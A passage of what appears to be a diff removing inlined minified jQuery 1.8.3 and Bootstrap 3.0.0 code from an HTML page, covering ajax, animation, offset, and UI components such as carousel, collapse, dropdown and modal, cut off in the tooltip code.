l,y,b,w,S,T=n;if(E===2)return;E=2,u&&clearTimeout(u),o=t,i=a||"",x.readyState=e>0?4:0,s&&(w=An(c,x,s));if(e>=200&&e<300||e===304)c.ifModified&&(S=x.getResponseHeader("Last-Modified"),S&&(v.lastModified[r]=S),S=x.getResponseHeader("Etag"),S&&(v.etag[r]=S)),e===304?(T="notmodified",l=!0):(l=On(c,w),T=l.state,y=l.data,b=l.error,l=!b);else{b=T;if(!T||e)T="error",e<0&&(e=0)}x.status=e,x.statusText=(n||T)+"",l?d.resolveWith(h,[y,T,x]):d.rejectWith(h,[x,T,b]),x.statusCode(g),g=t,f&&p.trigger("ajax"+(l?"Success":"Error"),[x,c,l?y:b]),m.fireWith(h,[x,T]),f&&(p.trigger("ajaxComplete",[x,c]),--v.active||v.event.trigger("ajaxStop"))}typeof e=="object"&&(n=e,e=t),n=n||{};var r,i,s,o,u,a,f,l,c=v.ajaxSetup({},n),h=c.context||c,p=h!==c&&(h.nodeType||h instanceof v)?v(h):v.event,d=v.Deferred(),m=v.Callbacks("once memory"),g=c.statusCode||{},b={},w={},E=0,S="canceled",x={readyState:0,setRequestHeader:function(e,t){if(!E){var n=e.toLowerCase();e=w[n]=w[n]||e,b[e]=t}return this},getAllResponseHeaders:function(){return E===2?i:null},getResponseHeader:function(e){var n;if(E===2){if(!s){s={};while(n=pn.exec(i))s[n[1].toLowerCase()]=n[2]}n=s[e.toLowerCase()]}return n===t?null:n},overrideMimeType:function(e){return E||(c.mimeType=e),this},abort:function(e){return e=e||S,o&&o.abort(e),T(0,e),this}};d.promise(x),x.success=x.done,x.error=x.fail,x.complete=m.add,x.statusCode=function(e){if(e){var t;if(E<2)for(t in e)g[t]=[g[t],e[t]];else t=e[x.status],x.always(t)}return this},c.url=((e||c.url)+"").replace(hn,"").replace(mn,ln[1]+"//"),c.dataTypes=v.trim(c.dataType||"*").toLowerCase().split(y),c.crossDomain==null&&(a=wn.exec(c.url.toLowerCase()),c.crossDomain=!(!a||a[1]===ln[1]&&a[2]===ln[2]&&(a[3]||(a[1]==="http:"?80:443))==(ln[3]||(ln[1]==="http:"?80:443)))),c.data&&c.processData&&typeof c.data!="string"&&(c.data=v.param(c.data,c.traditional)),kn(Sn,c,n,x);if(E===2)return x;f=c.global,c.type=c.type.toUpperCase(),c.hasContent=!vn.test(c.type),f&&v.active++===0&&v.event.trigger("ajaxStart");if(!c.hasContent){c.data&&(c.url+=(gn.test(c.url)?"&":"?")+c.data,delete c.data),r=c.url;if(c.cache===!1){var N=v.now(),C=c.url.replace(bn,"$1_="+N);c.url=C+(C===c.url?(gn.test(c.url)?"&":"?")+"_="+N:"")}}(c.data&&c.hasContent&&c.contentType!==!1||n.contentType)&&x.setRequestHeader("Content-Type",c.contentType),c.ifModified&&(r=r||c.url,v.lastModified[r]&&x.setRequestHeader("If-Modified-Since",v.lastModified[r]),v.etag[r]&&x.setRequestHeader("If-None-Match",v.etag[r])),x.setRequestHeader("Accept",c.dataTypes[0]&&c.accepts[c.dataTypes[0]]?c.accepts[c.dataTypes[0]]+(c.dataTypes[0]!=="*"?", "+Tn+"; q=0.01":""):c.accepts["*"]);for(l in c.headers)x.setRequestHeader(l,c.headers[l]);if(!c.beforeSend||c.beforeSend.call(h,x,c)!==!1&&E!==2){S="abort";for(l in{success:1,error:1,complete:1})x[l](c[l]);o=kn(xn,c,n,x);if(!o)T(-1,"No Transport");else{x.readyState=1,f&&p.trigger("ajaxSend",[x,c]),c.async&&c.timeout>0&&(u=setTimeout(function(){x.abort("timeout")},c.timeout));try{E=1,o.send(b,T)}catch(k){if(!(E<2))throw k;T(-1,k)}}return x}return x.abort()},active:0,lastModified:{},etag:{}});var Mn=[],_n=/\?/,Dn=/(=)\?(?=&|$)|\?\?/,Pn=v.now();v.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Mn.pop()||v.expando+"_"+Pn++;return this[e]=!0,e}}),v.ajaxPrefilter("json jsonp",function(n,r,i){var s,o,u,a=n.data,f=n.url,l=n.jsonp!==!1,c=l&&Dn.test(f),h=l&&!c&&typeof a=="string"&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Dn.test(a);if(n.dataTypes[0]==="jsonp"||c||h)return s=n.jsonpCallback=v.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,o=e[s],c?n.url=f.replace(Dn,"$1"+s):h?n.data=a.replace(Dn,"$1"+s):l&&(n.url+=(_n.test(f)?"&":"?")+n.jsonp+"="+s),n.converters["script json"]=function(){return u||v.error(s+" was not called"),u[0]},n.dataTypes[0]="json",e[s]=function(){u=arguments},i.always(function(){e[s]=o,n[s]&&(n.jsonpCallback=r.jsonpCallback,Mn.push(s)),u&&v.isFunction(o)&&o(u[0]),u=o=t}),"script"}),v.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(e){return v.globalEval(e),e}}}),v.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),v.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=i.head||i.getElementsByTagName("head")[0]||i.documentElement;return{send:function(s,o){n=i.createElement("script"),n.async="async",e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,i){if(i||!n.readyState||/loaded|complete/.test(n.readyState))n.onload=n.onreadystatechange=null,r&&n.parentNode&&r.removeChild(n),n=t,i||o(200,"success")},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(0,1)}}}});var Hn,Bn=e.ActiveXObject?function(){for(var e in Hn)Hn[e](0,1)}:!1,jn=0;v.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&Fn()||In()}:Fn,function(e){v.extend(v.support,{ajax:!!e,cors:!!e&&"withCredentials"in e})}(v.ajaxSettings.xhr()),v.support.ajax&&v.ajaxTransport(function(n){if(!n.crossDomain||v.support.cors){var r;return{send:function(i,s){var o,u,a=n.xhr();n.username?a.open(n.type,n.url,n.async,n.username,n.password):a.open(n.type,n.url,n.async);if(n.xhrFields)for(u in n.xhrFields)a[u]=n.xhrFields[u];n.mimeType&&a.overrideMimeType&&a.overrideMimeType(n.mimeType),!n.crossDomain&&!i["X-Requested-With"]&&(i["X-Requested-With"]="XMLHttpRequest");try{for(u in i)a.setRequestHeader(u,i[u])}catch(f){}a.send(n.hasContent&&n.data||null),r=function(e,i){var u,f,l,c,h;try{if(r&&(i||a.readyState===4)){r=t,o&&(a.onreadystatechange=v.noop,Bn&&delete Hn[o]);if(i)a.readyState!==4&&a.abort();else{u=a.status,l=a.getAllResponseHeaders(),c={},h=a.responseXML,h&&h.documentElement&&(c.xml=h);try{c.text=a.responseText}catch(p){}try{f=a.statusText}catch(p){f=""}!u&&n.isLocal&&!n.crossDomain?u=c.text?200:404:u===1223&&(u=204)}}}catch(d){i||s(-1,d)}c&&s(u,f,c,l)},n.async?a.readyState===4?setTimeout(r,0):(o=++jn,Bn&&(Hn||(Hn={},v(e).unload(Bn)),Hn[o]=r),a.onreadystatechange=r):r()},abort:function(){r&&r(0,1)}}}});var qn,Rn,Un=/^(?:toggle|show|hide)$/,zn=new RegExp("^(?:([-+])=|)("+m+")([a-z%]*)$","i"),Wn=/queueHooks$/,Xn=[Gn],Vn={"*":[function(e,t){var n,r,i=this.createTween(e,t),s=zn.exec(t),o=i.cur(),u=+o||0,a=1,f=20;if(s){n=+s[2],r=s[3]||(v.cssNumber[e]?"":"px");if(r!=="px"&&u){u=v.css(i.elem,e,!0)||n||1;do a=a||".5",u/=a,v.style(i.elem,e,u+r);while(a!==(a=i.cur()/o)&&a!==1&&--f)}i.unit=r,i.start=u,i.end=s[1]?u+(s[1]+1)*n:n}return i}]};v.Animation=v.extend(Kn,{tweener:function(e,t){v.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;r<i;r++)n=e[r],Vn[n]=Vn[n]||[],Vn[n].unshift(t)},prefilter:function(e,t){t?Xn.unshift(e):Xn.push(e)}}),v.Tween=Yn,Yn.prototype={constructor:Yn,init:function(e,t,n,r,i,s){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=s||(v.cssNumber[n]?"":"px")},cur:function(){var e=Yn.propHooks[this.prop];return e&&e.get?e.get(this):Yn.propHooks._default.get(this)},run:function(e){var t,n=Yn.propHooks[this.prop];return this.options.duration?this.pos=t=v.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):this.pos=t=e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):Yn.propHooks._default.set(this),this}},Yn.prototype.init.prototype=Yn.prototype,Yn.propHooks={_default:{get:function(e){var t;return e.elem[e.prop]==null||!!e.elem.style&&e.elem.style[e.prop]!=null?(t=v.css(e.elem,e.prop,!1,""),!t||t==="auto"?0:t):e.elem[e.prop]},set:function(e){v.fx.step[e.prop]?v.fx.step[e.prop](e):e.elem.style&&(e.elem.style[v.cssProps[e.prop]]!=null||v.cssHooks[e.prop])?v.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},Yn.propHooks.scrollTop=Yn.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},v.each(["toggle","show","hide"],function(e,t){var n=v.fn[t];v.fn[t]=function(r,i,s){return r==null||typeof r=="boolean"||!e&&v.isFunction(r)&&v.isFunction(i)?n.apply(this,arguments):this.animate(Zn(t,!0),r,i,s)}}),v.fn.extend({fadeTo:function(e,t,n,r){return this.filter(Gt).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=v.isEmptyObject(e),s=v.speed(t,n,r),o=function(){var t=Kn(this,v.extend({},e),s);i&&t.stop(!0)};return i||s.queue===!1?this.each(o):this.queue(s.queue,o)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return typeof e!="string"&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=e!=null&&e+"queueHooks",s=v.timers,o=v._data(this);if(n)o[n]&&o[n].stop&&i(o[n]);else for(n in o)o[n]&&o[n].stop&&Wn.test(n)&&i(o[n]);for(n=s.length;n--;)s[n].elem===this&&(e==null||s[n].queue===e)&&(s[n].anim.stop(r),t=!1,s.splice(n,1));(t||!r)&&v.dequeue(this,e)})}}),v.each({slideDown:Zn("show"),slideUp:Zn("hide"),slideToggle:Zn("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){v.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),v.speed=function(e,t,n){var r=e&&typeof e=="object"?v.extend({},e):{complete:n||!n&&t||v.isFunction(e)&&e,duration:e,easing:n&&t||t&&!v.isFunction(t)&&t};r.duration=v.fx.off?0:typeof r.duration=="number"?r.duration:r.duration in v.fx.speeds?v.fx.speeds[r.duration]:v.fx.speeds._default;if(r.queue==null||r.queue===!0)r.queue="fx";return r.old=r.complete,r.complete=function(){v.isFunction(r.old)&&r.old.call(this),r.queue&&v.dequeue(this,r.queue)},r},v.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},v.timers=[],v.fx=Yn.prototype.init,v.fx.tick=function(){var e,n=v.timers,r=0;qn=v.now();for(;r<n.length;r++)e=n[r],!e()&&n[r]===e&&n.splice(r--,1);n.length||v.fx.stop(),qn=t},v.fx.timer=function(e){e()&&v.timers.push(e)&&!Rn&&(Rn=setInterval(v.fx.tick,v.fx.interval))},v.fx.interval=13,v.fx.stop=function(){clearInterval(Rn),Rn=null},v.fx.speeds={slow:600,fast:200,_default:400},v.fx.step={},v.expr&&v.expr.filters&&(v.expr.filters.animated=function(e){return v.grep(v.timers,function(t){return e===t.elem}).length});var er=/^(?:body|html)$/i;v.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){v.offset.setOffset(this,e,t)});var n,r,i,s,o,u,a,f={top:0,left:0},l=this[0],c=l&&l.ownerDocument;if(!c)return;return(r=c.body)===l?v.offset.bodyOffset(l):(n=c.documentElement,v.contains(n,l)?(typeof l.getBoundingClientRect!="undefined"&&(f=l.getBoundingClientRect()),i=tr(c),s=n.clientTop||r.clientTop||0,o=n.clientLeft||r.clientLeft||0,u=i.pageYOffset||n.scrollTop,a=i.pageXOffset||n.scrollLeft,{top:f.top+u-s,left:f.left+a-o}):f)},v.offset={bodyOffset:function(e){var t=e.offsetTop,n=e.offsetLeft;return v.support.doesNotIncludeMarginInBodyOffset&&(t+=parseFloat(v.css(e,"marginTop"))||0,n+=parseFloat(v.css(e,"marginLeft"))||0),{top:t,left:n}},setOffset:function(e,t,n){var r=v.css(e,"position");r==="static"&&(e.style.position="relative");var i=v(e),s=i.offset(),o=v.css(e,"top"),u=v.css(e,"left"),a=(r==="absolute"||r==="fixed")&&v.inArray("auto",[o,u])>-1,f={},l={},c,h;a?(l=i.position(),c=l.top,h=l.left):(c=parseFloat(o)||0,h=parseFloat(u)||0),v.isFunction(t)&&(t=t.call(e,n,s)),t.top!=null&&(f.top=t.top-s.top+c),t.left!=null&&(f.left=t.left-s.left+h),"using"in t?t.using.call(e,f):i.css(f)}},v.fn.extend({position:function(){if(!this[0])return;var e=this[0],t=this.offsetParent(),n=this.offset(),r=er.test(t[0].nodeName)?{top:0,left:0}:t.offset();return n.top-=parseFloat(v.css(e,"marginTop"))||0,n.left-=parseFloat(v.css(e,"marginLeft"))||0,r.top+=parseFloat(v.css(t[0],"borderTopWidth"))||0,r.left+=parseFloat(v.css(t[0],"borderLeftWidth"))||0,{top:n.top-r.top,left:n.left-r.left}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||i.body;while(e&&!er.test(e.nodeName)&&v.css(e,"position")==="static")e=e.offsetParent;return e||i.body})}}),v.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);v.fn[e]=function(i){return v.access(this,function(e,i,s){var o=tr(e);if(s===t)return o?n in o?o[n]:o.document.documentElement[i]:e[i];o?o.scrollTo(r?v(o).scrollLeft():s,r?s:v(o).scrollTop()):e[i]=s},e,i,arguments.length,null)}}),v.each({Height:"height",Width:"width"},function(e,n){v.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){v.fn[i]=function(i,s){var o=arguments.length&&(r||typeof i!="boolean"),u=r||(i===!0||s===!0?"margin":"border");return v.access(this,function(n,r,i){var s;return v.isWindow(n)?n.document.documentElement["client"+e]:n.nodeType===9?(s=n.documentElement,Math.max(n.body["scroll"+e],s["scroll"+e],n.body["offset"+e],s["offset"+e],s["client"+e])):i===t?v.css(n,r,i,u):v.style(n,r,i,u)},n,o?i:t,o,null)}})}),e.jQuery=e.$=v,typeof define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return v})})(window);</script>
-<!-- END extlib/js/jquery-1.8.3.min.js -->
-<!-- START extlib/js/bootstrap-3.0.0.min.js -->
-<script type="text/javascript">/**
-* bootstrap.js v3.0.0 by @fat and @mdo
-* Copyright 2013 Twitter Inc.
-* http://www.apache.org/licenses/LICENSE-2.0
-*/
-if(!jQuery)throw new Error("Bootstrap requires jQuery");+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]}}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one(a.support.transition.end,function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b()})}(window.jQuery),+function(a){"use strict";var b='[data-dismiss="alert"]',c=function(c){a(c).on("click",b,this.close)};c.prototype.close=function(b){function c(){f.trigger("closed.bs.alert").remove()}var d=a(this),e=d.attr("data-target");e||(e=d.attr("href"),e=e&&e.replace(/.*(?=#[^\s]*$)/,""));var f=a(e);b&&b.preventDefault(),f.length||(f=d.hasClass("alert")?d:d.parent()),f.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(f.removeClass("in"),a.support.transition&&f.hasClass("fade")?f.one(a.support.transition.end,c).emulateTransitionEnd(150):c())};var d=a.fn.alert;a.fn.alert=function(b){return this.each(function(){var d=a(this),e=d.data("bs.alert");e||d.data("bs.alert",e=new c(this)),"string"==typeof b&&e[b].call(d)})},a.fn.alert.Constructor=c,a.fn.alert.noConflict=function(){return a.fn.alert=d,this},a(document).on("click.bs.alert.data-api",b,c.prototype.close)}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d)};b.DEFAULTS={loadingText:"loading..."},b.prototype.setState=function(a){var b="disabled",c=this.$element,d=c.is("input")?"val":"html",e=c.data();a+="Text",e.resetText||c.data("resetText",c[d]()),c[d](e[a]||this.options[a]),setTimeout(function(){"loadingText"==a?c.addClass(b).attr(b,b):c.removeClass(b).removeAttr(b)},0)},b.prototype.toggle=function(){var a=this.$element.closest('[data-toggle="buttons"]');if(a.length){var b=this.$element.find("input").prop("checked",!this.$element.hasClass("active")).trigger("change");"radio"===b.prop("type")&&a.find(".active").removeClass("active")}this.$element.toggleClass("active")};var c=a.fn.button;a.fn.button=function(c){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof c&&c;e||d.data("bs.button",e=new b(this,f)),"toggle"==c?e.toggle():c&&e.setState(c)})},a.fn.button.Constructor=b,a.fn.button.noConflict=function(){return a.fn.button=c,this},a(document).on("click.bs.button.data-api","[data-toggle^=button]",function(b){var c=a(b.target);c.hasClass("btn")||(c=c.closest(".btn")),c.button("toggle"),b.preventDefault()})}(window.jQuery),+function(a){"use strict";var b=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=this.sliding=this.interval=this.$active=this.$items=null,"hover"==this.options.pause&&this.$element.on("mouseenter",a.proxy(this.pause,this)).on("mouseleave",a.proxy(this.cycle,this))};b.DEFAULTS={interval:5e3,pause:"hover",wrap:!0},b.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},b.prototype.getActiveIndex=function(){return this.$active=this.$element.find(".item.active"),this.$items=this.$active.parent().children(),this.$items.index(this.$active)},b.prototype.to=function(b){var c=this,d=this.getActiveIndex();return b>this.$items.length-1||0>b?void 0:this.sliding?this.$element.one("slid",function(){c.to(b)}):d==b?this.pause().cycle():this.slide(b>d?"next":"prev",a(this.$items[b]))},b.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition.end&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},b.prototype.next=function(){return this.sliding?void 0:this.slide("next")},b.prototype.prev=function(){return this.sliding?void 0:this.slide("prev")},b.prototype.slide=function(b,c){var d=this.$element.find(".item.active"),e=c||d[b](),f=this.interval,g="next"==b?"left":"right",h="next"==b?"first":"last",i=this;if(!e.length){if(!this.options.wrap)return;e=this.$element.find(".item")[h]()}this.sliding=!0,f&&this.pause();var j=a.Event("slide.bs.carousel",{relatedTarget:e[0],direction:g});if(!e.hasClass("active")){if(this.$indicators.length&&(this.$indicators.find(".active").removeClass("active"),this.$element.one("slid",function(){var b=a(i.$indicators.children()[i.getActiveIndex()]);b&&b.addClass("active")})),a.support.transition&&this.$element.hasClass("slide")){if(this.$element.trigger(j),j.isDefaultPrevented())return;e.addClass(b),e[0].offsetWidth,d.addClass(g),e.addClass(g),d.one(a.support.transition.end,function(){e.removeClass([b,g].join(" ")).addClass("active"),d.removeClass(["active",g].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger("slid")},0)}).emulateTransitionEnd(600)}else{if(this.$element.trigger(j),j.isDefaultPrevented())return;d.removeClass("active"),e.addClass("active"),this.sliding=!1,this.$element.trigger("slid")}return f&&this.cycle(),this}};var c=a.fn.carousel;a.fn.carousel=function(c){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},b.DEFAULTS,d.data(),"object"==typeof c&&c),g="string"==typeof c?c:f.slide;e||d.data("bs.carousel",e=new b(this,f)),"number"==typeof c?e.to(c):g?e[g]():f.interval&&e.pause().cycle()})},a.fn.carousel.Constructor=b,a.fn.carousel.noConflict=function(){return a.fn.carousel=c,this},a(document).on("click.bs.carousel.data-api","[data-slide], [data-slide-to]",function(b){var c,d=a(this),e=a(d.attr("data-target")||(c=d.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"")),f=a.extend({},e.data(),d.data()),g=d.attr("data-slide-to");g&&(f.interval=!1),e.carousel(f),(g=d.attr("data-slide-to"))&&e.data("bs.carousel").to(g),b.preventDefault()}),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var b=a(this);b.carousel(b.data())})})}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d),this.transitioning=null,this.options.parent&&(this.$parent=a(this.options.parent)),this.options.toggle&&this.toggle()};b.DEFAULTS={toggle:!0},b.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},b.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b=a.Event("show.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.$parent&&this.$parent.find("> .panel > .in");if(c&&c.length){var d=c.data("bs.collapse");if(d&&d.transitioning)return;c.collapse("hide"),d||c.data("bs.collapse",null)}var e=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[e](0),this.transitioning=1;var f=function(){this.$element.removeClass("collapsing").addClass("in")[e]("auto"),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return f.call(this);var g=a.camelCase(["scroll",e].join("-"));this.$element.one(a.support.transition.end,a.proxy(f,this)).emulateTransitionEnd(350)[e](this.$element[0][g])}}},b.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse").removeClass("in"),this.transitioning=1;var d=function(){this.transitioning=0,this.$element.trigger("hidden.bs.collapse").removeClass("collapsing").addClass("collapse")};return a.support.transition?(this.$element[c](0).one(a.support.transition.end,a.proxy(d,this)).emulateTransitionEnd(350),void 0):d.call(this)}}},b.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()};var c=a.fn.collapse;a.fn.collapse=function(c){return this.each(function(){var d=a(this),e=d.data("bs.collapse"),f=a.extend({},b.DEFAULTS,d.data(),"object"==typeof c&&c);e||d.data("bs.collapse",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.collapse.Constructor=b,a.fn.collapse.noConflict=function(){return a.fn.collapse=c,this},a(document).on("click.bs.collapse.data-api","[data-toggle=collapse]",function(b){var c,d=a(this),e=d.attr("data-target")||b.preventDefault()||(c=d.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,""),f=a(e),g=f.data("bs.collapse"),h=g?"toggle":d.data(),i=d.attr("data-parent"),j=i&&a(i);g&&g.transitioning||(j&&j.find('[data-toggle=collapse][data-parent="'+i+'"]').not(d).addClass("collapsed"),d[f.hasClass("in")?"addClass":"removeClass"]("collapsed")),f.collapse(h)})}(window.jQuery),+function(a){"use strict";function b(){a(d).remove(),a(e).each(function(b){var d=c(a(this));d.hasClass("open")&&(d.trigger(b=a.Event("hide.bs.dropdown")),b.isDefaultPrevented()||d.removeClass("open").trigger("hidden.bs.dropdown"))})}function c(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}var d=".dropdown-backdrop",e="[data-toggle=dropdown]",f=function(b){a(b).on("click.bs.dropdown",this.toggle)};f.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=c(e),g=f.hasClass("open");if(b(),!g){if("ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a('<div class="dropdown-backdrop"/>').insertAfter(a(this)).on("click",b),f.trigger(d=a.Event("show.bs.dropdown")),d.isDefaultPrevented())return;f.toggleClass("open").trigger("shown.bs.dropdown"),e.focus()}return!1}},f.prototype.keydown=function(b){if(/(38|40|27)/.test(b.keyCode)){var d=a(this);if(b.preventDefault(),b.stopPropagation(),!d.is(".disabled, :disabled")){var f=c(d),g=f.hasClass("open");if(!g||g&&27==b.keyCode)return 27==b.which&&f.find(e).focus(),d.click();var h=a("[role=menu] li:not(.divider):visible a",f);if(h.length){var i=h.index(h.filter(":focus"));38==b.keyCode&&i>0&&i--,40==b.keyCode&&i<h.length-1&&i++,~i||(i=0),h.eq(i).focus()}}}};var g=a.fn.dropdown;a.fn.dropdown=function(b){return this.each(function(){var c=a(this),d=c.data("dropdown");d||c.data("dropdown",d=new f(this)),"string"==typeof b&&d[b].call(c)})},a.fn.dropdown.Constructor=f,a.fn.dropdown.noConflict=function(){return a.fn.dropdown=g,this},a(document).on("click.bs.dropdown.data-api",b).on("click.bs.dropdown.data-api",".dropdown form",function(a){a.stopPropagation()}).on("click.bs.dropdown.data-api",e,f.prototype.toggle).on("keydown.bs.dropdown.data-api",e+", [role=menu]",f.prototype.keydown)}(window.jQuery),+function(a){"use strict";var b=function(b,c){this.options=c,this.$element=a(b),this.$backdrop=this.isShown=null,this.options.remote&&this.$element.load(this.options.remote)};b.DEFAULTS={backdrop:!0,keyboard:!0,show:!0},b.prototype.toggle=function(a){return this[this.isShown?"hide":"show"](a)},b.prototype.show=function(b){var c=this,d=a.Event("show.bs.modal",{relatedTarget:b});this.$element.trigger(d),this.isShown||d.isDefaultPrevented()||(this.isShown=!0,this.escape(),this.$element.on("click.dismiss.modal",'[data-dismiss="modal"]',a.proxy(this.hide,this)),this.backdrop(function(){var d=a.support.transition&&c.$element.hasClass("fade");c.$element.parent().length||c.$element.appendTo(document.body),c.$element.show(),d&&c.$element[0].offsetWidth,c.$element.addClass("in").attr("aria-hidden",!1),c.enforceFocus();var e=a.Event("shown.bs.modal",{relatedTarget:b});d?c.$element.find(".modal-dialog").one(a.support.transition.end,function(){c.$element.focus().trigger(e)}).emulateTransitionEnd(300):c.$element.focus().trigger(e)}))},b.prototype.hide=function(b){b&&b.preventDefault(),b=a.Event("hide.bs.modal"),this.$element.trigger(b),this.isShown&&!b.isDefaultPrevented()&&(this.isShown=!1,this.escape(),a(document).off("focusin.bs.modal"),this.$element.removeClass("in").attr("aria-hidden",!0).off("click.dismiss.modal"),a.support.transition&&this.$element.hasClass("fade")?this.$element.one(a.support.transition.end,a.proxy(this.hideModal,this)).emulateTransitionEnd(300):this.hideModal())},b.prototype.enforceFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(a){this.$element[0]===a.target||this.$element.has(a.target).length||this.$element.focus()},this))},b.prototype.escape=function(){this.isShown&&this.options.keyboard?this.$element.on("keyup.dismiss.bs.modal",a.proxy(function(a){27==a.which&&this.hide()},this)):this.isShown||this.$element.off("keyup.dismiss.bs.modal")},b.prototype.hideModal=function(){var a=this;this.$element.hide(),this.backdrop(function(){a.removeBackdrop(),a.$element.trigger("hidden.bs.modal")})},b.prototype.removeBackdrop=function(){this.$backdrop&&this.$backdrop.remove(),this.$backdrop=null},b.prototype.backdrop=function(b){var c=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var d=a.support.transition&&c;if(this.$backdrop=a('<div class="modal-backdrop '+c+'" />').appendTo(document.body),this.$element.on("click.dismiss.modal",a.proxy(function(a){a.target===a.currentTarget&&("static"==this.options.backdrop?this.$element[0].focus.call(this.$element[0]):this.hide.call(this))},this)),d&&this.$backdrop[0].offsetWidth,this.$backdrop.addClass("in"),!b)return;d?this.$backdrop.one(a.support.transition.end,b).emulateTransitionEnd(150):b()}else!this.isShown&&this.$backdrop?(this.$backdrop.removeClass("in"),a.support.transition&&this.$element.hasClass("fade")?this.$backdrop.one(a.support.transition.end,b).emulateTransitionEnd(150):b()):b&&b()};var c=a.fn.modal;a.fn.modal=function(c,d){return this.each(function(){var e=a(this),f=e.data("bs.modal"),g=a.extend({},b.DEFAULTS,e.data(),"object"==typeof c&&c);f||e.data("bs.modal",f=new b(this,g)),"string"==typeof c?f[c](d):g.show&&f.show(d)})},a.fn.modal.Constructor=b,a.fn.modal.noConflict=function(){return a.fn.modal=c,this},a(document).on("click.bs.modal.data-api",'[data-toggle="modal"]',function(b){var c=a(this),d=c.attr("href"),e=a(c.attr("data-target")||d&&d.replace(/.*(?=#[^\s]+$)/,"")),f=e.data("modal")?"toggle":a.extend({remote:!/#/.test(d)&&d},e.data(),c.data());b.preventDefault(),e.modal(f,this).one("hide",function(){c.is(":visible")&&c.focus()})}),a(document).on("show.bs.modal",".modal",function(){a(document.body).addClass("modal-open")}).on("hidden.bs.modal",".modal",function(){a(document.body).removeClass("modal-open")})}(window.jQuery),+function(a){"use strict";var b=function(a,b){this.type=this.options=this.enabled=this.timeout=this.hoverState=this.$element=null,this.init("tooltip",a,b)};b.DEFAULTS={animation:!0,placement:"top",selector:!1,template:'<div class="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover 